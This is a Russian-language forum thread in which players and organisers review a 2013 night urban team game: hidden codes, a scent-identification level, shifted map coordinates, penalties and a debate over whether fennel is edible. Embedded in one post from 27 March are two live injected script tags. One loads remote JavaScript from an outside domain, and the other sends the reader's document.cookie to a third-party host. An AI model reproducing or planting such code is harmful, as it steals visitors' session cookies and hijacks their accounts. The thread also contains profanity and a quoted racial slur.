Если честно, ожидал 3-4 лайтовую схваточку, не обратив внимания на число авторов), так что продолжительностью вы меня тоже приятно удивили(штаба бы побольше, ждать перегоны и поиски просто зай:eek:бся).

Не-не-не, это Дедлайн, здесь лайтово не бывает )

Гаечка
26-03-2013, 12:07
Как из задания на запахах надо выкурить, что коды есть не на всех метках - это до сих пор для меня великая тайна.





Впрочем, это совсем не мешало друзьям время от времени встречаться и устраивать дружеские соревнования в остроте нюха: например, определяя на рынке различные продукты по запаху.



Брунгильда, персиваль, медуза и т.д. - вообще адский ад. я вам 100500 способов могу предложить, как из них еще коорды выкурить (что мы собственно и сделали на игре) - и будут согласовываться с вашей же легендой.



На форуме многие уже ответили, а в сценарии можно прочитать то же самое, написанное авторами =)



2. При указанной последовательности уровней на игре почему нельзя было разнести для команд уровень с котом? В итоге адские стоптаймы... благо макдак в двух перекрестках).



Да, тут, конечно, вышла жесть. Мы рассчитывали, что первый уровень растянет команды (к сожалению, по причинам, которые до сих пор остаются для нас загадкой, “Конструктор” вызвал серьезные затруднения), и Котенок, распараллеленный с Кротом, не создадут значительных флешмобов. Как получилось в действительности, вы знаете.

Кстати, говоря о сталкере, уместно отметить превосходные действия игроков команды CodeBreakers и ни в какие ворота не лезущие действия игроков команды NoName.

Гаечка
26-03-2013, 12:07
На какой из остановок и в каком конкретно месте был код с точки 5.3., которая бьет в ларек "Цветы.24 часа"?

Накануне игры гугл-карты обновились. В начале игры мы поняли, что все точки оказались смещены относительно тех мест, куда были поставлены изначально. К сожалению, единственным способом сохранить равные условия для всех команд (и для тех, кто звонил/писал оргам, и для тех, кто этого не делал) было сообщать только то, что знают все команды. Поэтому на ваш звонок орг сказал то, что видел в самой карте (и что, соответственно, видели игроки всех остальных команд): "Остановка пл. Мужества".

Гаечка
26-03-2013, 12:08
Зашло, спасибо, в целом молодцы :)

Первый вопрос:

сколько человек писали сталкер? если один, то на всех ли метках были коды? если на всех, то где был код на метке со стрелочкими и 5ю метрами?



Сталкер писало 2 человека, но это не помешало всем меткам иметь свои коды =) Возле метки со стрелочками код был у самой первой колонны на стене, если идти по парапету.

Гаечка
26-03-2013, 12:08
По поводу игры:

- совершенно не понятно, зачем было делать первый 3-х часовой уровень линейным, тем более, как оказалось, с косяком в текстовке одного из подуровней, что привело к столпотворению на каждой из трех лок;



См. сценарий.

Ol4ik
26-03-2013, 12:15
Накануне игры гугл-карты обновились. В начале игры мы поняли, что все точки оказались смещены относительно тех мест, куда были поставлены изначально. К сожалению, единственным способом сохранить равные условия для всех команд (и для тех, кто звонил/писал оргам, и для тех, кто этого не делал) было сообщать только то, что знают все команды. Поэтому на ваш звонок орг сказал то, что видел в самой карте (и что, соответственно, видели игроки всех остальных команд): "Остановка пл. Мужества".

чота очень напомнило :
"Короче, как оказалось, я не виноват. Коорды правильные, это точно. И я проверял - все было классно. Но потом началась неведомая х*йня, которая происходит и по сей момент. Во-первых, переписался сам файл закурки. Во вторых, он обращается в папку и тянет оттуда файлы, хотя этих файлов в папке нет. Короче, во всем виноват какой-то кеш хостера. Прикол в том, что нам очень повезло, просто нереально повезло. Скажи мне, какова вероятность того, что, перемешав двое кардинат совершенно рандомными кусками, ты получишь координаты места, в котором люди должны оказаться, но чуть позже? По-моему это ноль!"

Суть в том, что из-за какого-то бага часть картинок из задания была замещена картинками, использованными в тесте, и отображавшими случайно взятые координаты. В результате, по невероятной случайности, координаты в задании стали показывать на другое использованное нами место.
типа не виноватая я, он сам пришел :)

prinncessa
26-03-2013, 12:16
Кстати, говоря о сталкере, уместно отметить превосходные действия игроков команды CodeBreakers и ни в какие ворота не лезущие действия игроков команды NoName.
Что натворили NoName?

И откройте плиз топ-10.

грициан
26-03-2013, 12:18
(к сожалению, по причинам, которые до сих пор остаются для нас загадкой, “Конструктор” вызвал серьезные затруднения)

У вас косяк в шифровке, из-за которого невозможно было получить номер локи в викимапии до сливной подсказки.

Grom
26-03-2013, 12:25
У вас косяк в шифровке, из-за которого невозможно было получить номер локи в викимапии до сливной подсказки.

+1 еще на игре порадовались :)

Гаечка
26-03-2013, 12:28
У вас косяк в шифровке, из-за которого невозможно было получить номер локи в викимапии до сливной подсказки.

В сценарии можно прочитать, что

Загадка основана на альбоме Constructorr - RAVE Revolution [2008]. Номер песни давал ЦИФРУ (именно поэтому Сталлоне давал 0, а не 10). Из этих цифр получался ID объекта в Викимапии.

Причины, по которым команды не догадывались взять "0" вместо "10", для автора задания продолжают оставаться загадкой. Тем более что некоторые команды догадались даже использовать полученное число как ID объекта в Wikimapia, который, как известно, имеет длину 8 символов.

mymy
26-03-2013, 12:31
Причины, по которым команды не догадывались взять "0" вместо "10", для автора задания продолжают оставаться загадкой.
Причины, по которой авторы считали, что команды должны догадаться взять "0" вместо "10" для меня остаются загадкой.

грициан
26-03-2013, 12:38
В сценарии можно прочитать, что

Причины, по которым команды не догадывались взять "0" вместо "10", для автора задания продолжают оставаться загадкой. Тем более что некоторые команды догадались даже использовать полученное число как ID объекта в Wikimapia, который, как известно, имеет длину 8 символов.

Are you serious?

Velkopiterskij
26-03-2013, 12:40
ID объекта в Wikimapia, который, как известно, имеет длину 8 символов.
Спасибо, теперь известно.

Да, про точку Фейнмана повеселило.

Гаечка
26-03-2013, 12:40
Are you serious?

Да-да, на полном серьезе! Два независимых комплекта тестировщиков без труда отбросили единицу от десятки. Для нас оказалось полной неожиданностью, что командам пришлось ждать второй подсказки, чтобы раскурить это задание. В следующий раз мы возьмем три комплекта тестировщиков =)

Гаечка
26-03-2013, 12:43
Что натворили NoName?

Пренебрегли требованием соблюдать свето- и шумомаскировку. Однако решением агентов, согласованным с остальными оргами, штраф назначен не был.


И откройте плиз топ-10.

Сделано.

Laww
26-03-2013, 13:08
Ваще смысла в таком сталкере нет тогда.

Heckfy
26-03-2013, 13:22
"Это баскетбол, вы - негры, что непонятного?"
Это заброс без окон, на улице ночь, на локации коды...
По какому параметру замерялся уровень "дискотечности"?
Скажите мне, кто из НоНаме был на уровне, я им лицо обгладаю, потому что вместо того чтобы искать кодюли и не слить уровень, они танцевали и светили в окно...

Гаечка
26-03-2013, 13:34
"Это баскетбол, вы - негры, что непонятного?"
Это заброс без окон, на улице ночь, на локации коды...
По какому параметру замерялся уровень "дискотечности"?
Скажите мне, кто из НоНаме был на уровне, я им лицо обгладаю, потому что вместо того чтобы искать кодюли и не слить уровень, они танцевали и светили в окно...

Примерно полчаса назад подробная информация предоставлена агентом ZORGer Принцессе. При необходимости мы готовы продублировать ее (информацию) куда бы то ни было еще.

Heckfy
26-03-2013, 13:45
Я вам могу сам процетировать впшего агента: -"... просто никакой другой команде замечание сделано не было"
Ну блять это всё объясняет.
Короче, мне не хочется спорить с мультяхой, у нас свой есть, но когда на уровне есть окна, есть коды, фонари у команды не забирают, а игра линейная, то штрафы можно херачить по своему усмотрению любой понравившейся/непонравившейся команде.
Игра понравилась, но непонятно нахера писать про то какие эти молодцы, а эти мудаки, если решение все равно не принято. Эмоциональный фон передать разве что.

Гаечка
26-03-2013, 13:48
Спасибо всем, кто играл в нашу игру! Отдельное спасибо всем, кто оставил о ней отзывы. И особенное спасибо тем, кто оставил положительные отзывы: nadlooshi, ndevil, flaxing, DJs_FAN, Heckfy, -Antoshka-, Kroxa, Confeta, Book'Sir, Pukkaras, Дмитрич, Goy.

Отдельное хочется отметить DEd_MONro и Velkopiterskij, снимавшим значительную часть вопросов команд до того, как это успевали сделать орги. Velkopiterskij, ты настолько четко и правильно воспринимал всю информацию, исходившую от оргов, что в определенный момент мы засомневались в том, что ты не делал игру вместе с нами =) Для тебя вечно открыта вакансия PR-менеджера команды WTF =)

Гаечка
26-03-2013, 13:55
Я вам могу сам процетировать впшего агента: -"... просто никакой другой команде замечание сделано не было"
Ну блять это всё объясняет.
Короче, мне не хочется спорить с мультяхой, у нас свой есть, но когда на уровне есть окна, есть коды, фонари у команды не забирают, а игра линейная, то штрафы можно херачить по своему усмотрению любой понравившейся/непонравившейся команде.
Игра понравилась, но непонятно нахера писать про то какие эти молодцы, а эти мудаки, если решение все равно не принято. Эмоциональный фон передать.

Если говорить о других командах, то насчет некоторых из них вообще невозможно было догадаться, что они находятся на уровне - настолько тихо и незаметно они себя вели. И мы до сих пор сомневаемся, что единственный способ объяснить игрокам команды NoName значение слова "сталкер" - это отобрать фонарики на штурмовой игре на локации без окон и кодов.

Поведение игроков команды NoName было упомянуто исключительно для того, чтобы обратить на него внимание самой команды NoName.

Heckfy
26-03-2013, 14:02
Спасибопожалуйста

Laww
26-03-2013, 14:39
А где в анонсе написано, что вы не будете считать штрафы в бонусной игре?

Гаечка
26-03-2013, 14:42
А где в анонсе написано, что вы не будете считать штрафы в бонусной игре?

Такой информации в анонсе нет и не может быть, потому что мы изначально планировали их учитывать и в итоге учли.

Velkopiterskij
26-03-2013, 14:43
А где в анонсе написано, что вы не будете считать штрафы в бонусной игре?

А разве не считали? Посмотрел только что стату. Всё корректно. Каждой команде начислено 10 часов бонуса. Что бы приятнее для оргов смотрелось. Всё остальное начислено движком.

Гаечка
26-03-2013, 15:07
Каждой команде начислено 10 часов бонуса. Что бы приятнее для оргов смотрелось.

Именно так. Приносим извинения за то, что не акцентировали на этом внимание команд =)

Laww
26-03-2013, 15:10
Спасибо!

ndevil
26-03-2013, 15:36
Спасибо всем, кто играл в нашу игру! Отдельное спасибо всем, кто оставил о ней отзывы. И особенное спасибо тем, кто оставил положительные отзывы

спасибопожалуйста, но расскажите все-таки про код 9.3 на бонусной игре, правда интересно, где он там был (если вобще был), облизали по очереди в два экипажа все 4 остановки, ларек, урны, знаки, скамейки...

по игре - задумка с уровнем запахи понравилась, повеселил флешмоб на конструкторе, на перфаках почти не побывал, кроме финишного но и его хватило :) отдельное спасибо за много единичек, так уж получилось что в самом начале игры сильно повредил ногу, но даже в таком елепередвигающемся и хромающем состоянии досталось немного поснимать кодюли.

про адские стоптаймы и спать в макдаке уже итак писали, тоже не понравилось.

Clinique
26-03-2013, 15:47
Щас боюсь показаться предвзятым. Аккуратнее всех на мой взгляд сработали брейкеры. Спокойно вошли, без лишней суеты и кипеша прочесали здание и вышли. На самом деле, проблем с "входом-выходом" не было ни у кого. Была куча претензий к командам по поводу поведения НА уровне, но коль скоро обошлось без общения с ментами, коллегиально было решено штрафов никому не навешивать. А вот за пределами забора творились мракобесие и махновщина.

Хочу сделать встречное замечание, после просьбы убрать экипажи мы убрали их моментально в направлении Макдака. Хотя на месте до нас и без нас было овер дохера машин кроме наших, и причина этому реализация уровня оргами (у брейкеров как у первых стоптайм 1,5 мин) естественно что бардака не было, каково было наше удивление когда мы обнаружили на уровне сталкер вереницу из машин и толпы людей, так что претензии стоит адресовать к ответственным за проведение уровня, а не пугать посфактум штрафами команды которые вынуждены были созерцать уже допущенный бардак. как игрок суммаигр могу добавить что за такую организацию сталкера твердый кол ) Что мешало загадать соседний перекресток ? =) Почему ты не проконтролировал то о чем пишешь на игре? а втирательством занимаешь после ?

Кюхель
26-03-2013, 15:57
Пост для тех, кто любит почитать.

Игра не оставила целостного впечатления, но объять необъятное, очевидно, задумка авторов :o. Распараллелить игру это интересно и храбро. Ближе к концу подумалось, что, было бы у нас чуть больше экипажей, 1 имело бы смысл отправить только на бонусы. Мы, по крайней мере, были бы за.)
Получилось же, что в голове фрагментарно-гносеологическая (прям другого слова и не подберу) каша из условий и 3-4 уровней основы и задорный многократный проезд по зоне за бонусами без практического понимания "сапёра", его сути и содержания, на голом драйве. Купленный до игры банан летал по салону, но так съеден и не был.

И вот что удалось почерпнуть. Разделю на основное и бонусные сообщения :rolleyes: :

Основное:
+ Громадное водительское спасибо за зону и отдельно за крота, это кайф. Несмотря на лагающую сеть, которая за кротом не успевала и не позволяла посекундно мониторить норы и наш первый экипаж, а также глухие заборы на дороге, одного-таки поймали, и я лично влепил ему лопатой между глаз. И по зоне игры - оказалось, такой размер зоны это преимущество. Было очень круто ловить бонусы то тут, то там - нашлась аналогия с Супер-Марио. В общем, то, что мы зацепили - в основном понравилось. Покатались знатно. И кажется, даже было небольшое подобие сюжета:p.

Бонусное:
- Орги, специально для вас: 221 рецепт блюд из фенхеля: http://www.gotovim.ru/subject/ovoshy/fenhel.shtml
Надеюсь, это позволит отныне считать забравшийся в несъедобный первый сектор фенхель (и тархун/анис, на которые запах похож), пригодным для пищи. Как вариант, сейчас после игры всё-таки проехать и прописать код на RR1=). Иначе зря мы его там, что ли, абсолютно логично искали около 2 часов.

Добью высказанную тут мысль про уровень "запахи". Идея прекрасна, окей, пусть даже будет съедобное-несъедобное, но логика съедобного должна быть командам понятна. Если вы имеете в виду то, что можно употреблять само по себе, а не как приправу, обязательно надо заложить намёк в загадку/подсказку (хотя какая там приправа, фенхель прекрасно употребляется как основа). Когда кода на однозначно съедобном секторе нет, этот момент становится ключевым. Ведь съедобное на автомате это то, что можно употребить, а не то, что вы считаете, можно употребить.
И было бы интересно узнать, что это были за запахи (все 10).

В целом эта игра = гигантская работа. Одно это достойно уважения. Спасибо.
Вымотались порядком за два подряд игровых дня, это хорошо;).

P.S. Волнует местоположение кода на Косыгина.

Pukkaras
26-03-2013, 16:17
На ударников от нонейма я видел Странного. Не знаю был ли он непосредственно на локе или просто подъезжал, но если Женя там был, то я в нем уверен на 100%, светить он бы мог только там где это можно делать. Вот уж кто кто, а Странный знает как выполнять такие уровни.
И да, как верно заметил Слава, метки на окнах, это ппц, учитывая то как позицианировался уровень .

Гаечка
26-03-2013, 18:03
спасибопожалуйста, но расскажите все-таки про код 9.3 на бонусной игре, правда интересно, где он там был (если вобще был), облизали по очереди в два экипажа все 4 остановки, ларек, урны, знаки, скамейки...


Да, извините, забыли описать ситуацию с этим кодом.
Код был прописан на внутренней стороне ножки скамейки на второй от площади остановке, но не на той стороне, на которую указывала точка на гугл-карте, а на противоположной. Смещение вызвано обновлением гугл-карт, о котором мы уже писали. Фотография кода, скорее всего, будет доступна завтра.

Deneb
26-03-2013, 18:51
P.S. Волнует местоположение кода на Косыгина.

http://floomby.ru/s1/saCb5Y

не парьтесь, все иногда не могут что то найти)

Punch
26-03-2013, 22:14
Как из задания на запахах надо выкурить, что коды есть не на всех метках - это до сих пор для меня великая тайна.



Впрочем, это совсем не мешало друзьям время от времени встречаться и устраивать дружеские соревнования в остроте нюха: например, определяя на рынке различные продукты по запаху.


На рынке продаются не только продукты питания. Продукты не ограничиваются продуктами питания.
Поэтому когда Майк сказал читать двигло, это никак мне не помогло. Кстати, напишите правильные запахи, интересно, где угадал, а где нет;)


Брунгильда, персиваль, медуза и т.д. - вообще адский ад. я вам 100500 способов могу предложить, как из них еще коорды выкурить (что мы собственно и сделали на игре) - и будут согласовываться с вашей же легендой.
На форуме многие уже ответили, а в сценарии можно прочитать то же самое, написанное авторами =)

Не курнули, сами себе насрали, но это не отменяет очень большой потребности в подсказках по полелогике, особенно к концу 9-го часа игры... Просто на будущее, ребята, учтите.

P.S. Поставил все пятерки, так как не нашел, к чему особо придраться))

Гаечка
27-03-2013, 08:34
Не курнули, сами себе насрали, но это не отменяет очень большой потребности в подсказках по полелогике, особенно к концу 9-го часа игры... Просто на будущее, ребята, учтите.


Панч, принято! =) Спасибо!

Изображение полевого кода от клетки 9.3 доступно, к сожалению, только в таком (http://s019.radikal.ru/i603/1303/aa/257d88db3280.jpg) виде. Оно не позволяет понять, где именно находится код, но он таки был =)

Just_Vinny
27-03-2013, 09:40
Кстати, напишите правильные запахи, интересно, где угадал, а где нет;)

вот да. любопытно. мы корицу унюхали там где не было кода...
спасибо за игру, за труды. первый уровень сбил настрой немного. мнения об игре в команде разделились, от меня спасибо за Крота.
без штаба печалька в ваши игры играть :(

Гаечка
27-03-2013, 12:01
Срок приема апелляций истек, апелляций не поступало.
Крайний срок выставления оценок - полдень 31 марта (вроде бы, поправьте, если 1 апреля).

Спасибо всем, кто играл!

P.S.
Список запахов из первого уровня:

Фенхель
Кокос
Малина
Лаванда
Гвоздика
Апельсин
Нейроли
Яблоко
Сосна
Клубника


<object width="550" height="124"><param name="movie" value="http://embed.prostopleer.com/track?id=B2zzesB3bmfaBoa3"></param><embed src="http://embed.prostopleer.com/track?id=B2zzesB3bmfaBoa3" type="application/x-shockwave-flash" width="550" height="124"></embed></object> <br> <small>Listen or <a href="http://prostopleer.com/tracks/5038084gQr2" target="_blank">download Чип и Дейл Спешат на помощь for free</a> on <a href="http://prostopleer.com/" target="_blank">Prostopleer</a></small>

miibus
27-03-2013, 12:20
это фишка такая укроп фенхелем называть?

Clinique
27-03-2013, 13:06
это фишка такая укроп фенхелем называть?
в интернетах говорят так

Фенхель - много летник,очень полезный,но нет укропного аромата. Даёт зелень до самого снега. Укроп -однолетник,быстро заканчивает цикл роста и не даёт зелень.Зато...аромат с картошечкой,оооооооооо

грициан
27-03-2013, 13:14
в интернетах говорят так

Судя по пунктуации в цитате, это очень авторитетный сайт.

Pukkaras
27-03-2013, 13:29
а анисом вы чо назвали ?

ndevil
27-03-2013, 14:08
Изображение полевого кода от клетки 9.3 доступно, к сожалению, только в таком (http://s019.radikal.ru/i603/1303/aa/257d88db3280.jpg) виде. Оно не позволяет понять, где именно находится код, но он таки был =)

спасибо, значит все-таки пиздоглазы, плюс смутило что корды били на противоположную сторону дороги.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

Clinique
27-03-2013, 14:11
Судя по пунктуации в цитате, это очень авторитетный сайт.

Ну чего занудничаешь Гриш, тебе ссылки на вику или разницу ? =)

El Red
27-03-2013, 17:06
Изображение полевого кода от клетки 9.3 доступно, к сожалению, только в таком (http://s019.radikal.ru/i603/1303/aa/257d88db3280.jpg) виде. Оно не позволяет понять, где именно находится код, но он таки был =)

Спалил знакомые сапоги)

CinderellA
27-03-2013, 17:16
Спалил знакомые сапоги)

Кто здесь?

El Red
28-03-2013, 14:25
Кто здесь?
нет никого :rolleyes:

а я вот чо вспомнил. седьмой-то детскую мечту исполнил? :D

Jaguar
28-03-2013, 15:33
нет никого :rolleyes:

а я вот чо вспомнил. седьмой-то детскую мечту исполнил? :D

нет( не нашел гаечку..

Punch
29-03-2013, 11:34
Список запахов из первого уровня:

Фенхель
Кокос
Малина
Лаванда
Гвоздика
Апельсин
Нейроли
Яблоко
Сосна
Клубника



Вот это жесть... у меня получались самбука, ваниль, вишня, клубника, пихта, персик, лимон, стиральный порошок, дерево, анис... попадание 1 из 10, и то не в тот запах)))
И да, представил: "Ало, Сгу, тут запахи разные... всего 10 штук! Какие? А, ну, это... точняк нейроли и фенхель!":D

Grom
29-03-2013, 11:40
Эээ...сходи к врачу. Если обоняние так изменено, то это может быть очень плохо...О.о

miibus
29-03-2013, 11:49
Эээ...сходи к врачу. Если обоняние так изменено, то это может быть очень плохо...О.о

зима и насморк у человека мб. по мне так все запахи одинаково пахли, только один был чётко определяемый- глинтвейн)

ZORGer
29-03-2013, 12:18
Ребята, я думаю вам пора завязывать с алкоголем, раз вам Самбука и глинтвейн четко мерещится. ;))

Punch
29-03-2013, 12:26
Ребята, я думаю вам пора завязывать с алкоголем, раз вам Самбука и глинтвейн четко мерещится. ;))

Да уж скорее пора наконец развязать, раз уж не помним, как самбука пахнет;)

ZORGer
29-03-2013, 12:45
Да уж скорее пора наконец развязать, раз уж не помним, как самбука пахнет;)

Тоже вариант. Ну так еще 4 игры и выезд. =)

Pukkaras
29-03-2013, 13:04
Фенхель
Кокос
Малина
Лаванда
Гвоздика
Апельсин
Нейроли
Яблоко
Сосна
Клубника

самбука
ваниль
вишня
клубника
пихта
персик
лимон
стиральный порошок
дерево
анис...
у нас так получалось:
Анис
Кокос
Малина/карамель
Пихта
Гвоздика
Апельсин/лимон
какая то хрень
Яблоко
Сосна
Клубника/глинтвейн
так что тупо сладкие запахи в итоге смотрели

Tvaruga
29-03-2013, 13:10
...
Нейроли
..




...
какая то хрень
...



ну в приииинципе....

Jaguar
29-03-2013, 14:31
игру то закроете? очки начислите?

Tvaruga
29-03-2013, 15:01
закроем. начислим.

Кюхель
29-03-2013, 15:44
Очевидно, моё предыдущее сообщение было настолько мелким, что его трудно было разглядеть.=) В следующий раз буду заметнее.

Так или иначе, по-прежнему ждём любого комментария о съедобности фенхеля.

Ol4ik
29-03-2013, 15:58
да уж :) список оргов выглядит "как бы так бы заебать бы?"

Гаечка
29-03-2013, 17:10
Очевидно, моё предыдущее сообщение было настолько мелким, что его трудно было разглядеть.=) В следующий раз буду заметнее.

Ой, наверное да )

Так или иначе, по-прежнему ждём любого комментария о съедобности фенхеля.

По нашему мнению, фенхель съедобен примерно настолько же, насколько съедобна гвоздика: кочанчики фенхеля, конечно (http://lady.mail.ru/product/fenhel/), можно потушить или запечь и подать в качестве гарнира к мясу или пасте, но все-таки в первую очередь это приправа. Найдя запах черного перца, вы вряд ли посчитали бы его съедобным, верно? А запечь ведь наверняка можно даже сосновые шишки. Только стоит ли?

Heckfy
29-03-2013, 18:21
Ну этож нейроли. Как не знал? Да я из дома не выйду пока полкилограмма этой нейроли не снюхаю.

Куличок
29-03-2013, 20:38
А с каких пор приправа - это нечто не съедобное? Я так, для общего развития :)

Кюхель
30-03-2013, 04:13
Ой, наверное да )


По нашему мнению, фенхель съедобен примерно настолько же, насколько съедобна гвоздика: кочанчики фенхеля, конечно (http://lady.mail.ru/product/fenhel/), можно потушить или запечь и подать в качестве гарнира к мясу или пасте, но все-таки в первую очередь это приправа. Найдя запах черного перца, вы вряд ли посчитали бы его съедобным, верно? А запечь ведь наверняка можно даже сосновые шишки. Только стоит ли?

В этом-то и дело. Если "по вашему мнению" именно так, надо это мнение до команд донести. "но все-таки в первую очередь это приправа" - как мы могли понять, что приправы съедобным не считаются? На основании чего:)?

Во-первых, гвоздика приправа, а фенхель спокойно употребляется как основное блюдо (см. пару страниц назад ссылку на рецепты). Но даже если и не так (допустим, оба приправы)... Получив ориентировку "съедобное-несъедобное", как "съедобное" любой человек воспринимает то, что можно физически съесть. То есть не ядовитое и пр. И этот запах туда входит... О чёрном перце говорить не будем, там был фенхель;).

Не вполне гуманно искать код у точно съедобного запаха, когда кода там нет (ты же не можешь проверить итоговый код, будучи уверен, что это-то съедобно, и => код уровня там есть). А надо было просто в последней подсказке намекнуть, что именно вы считаете съедобным и что это не вполне обычное понимание "съедобно-несъедобного".

Zlo
30-03-2013, 11:21
Гаечка уже не та...
http://cs407525.vk.me/v407525418/7367/LLsbTIBZoXo.jpg

Zlo
30-03-2013, 11:26
Да уж скорее пора наконец развязать, раз уж не помним, как самбука пахнет;)

Ребзя! всем срочно сюда (http://www.bols.com/about-house-of-bols-2/)!

был там. нюхал. круто.

Гаечка
31-03-2013, 18:42
Игры закрыты, очки начислены.

Еще раз спасибо всем, кто играл, отзывался и ставил оценки )

meatgrinder
01-04-2013, 13:43
http://www.google.ru/intl/ru/landing/nose/

Laww
01-04-2013, 22:04
Команда ВТФ получила 14 баллов в рейтинг.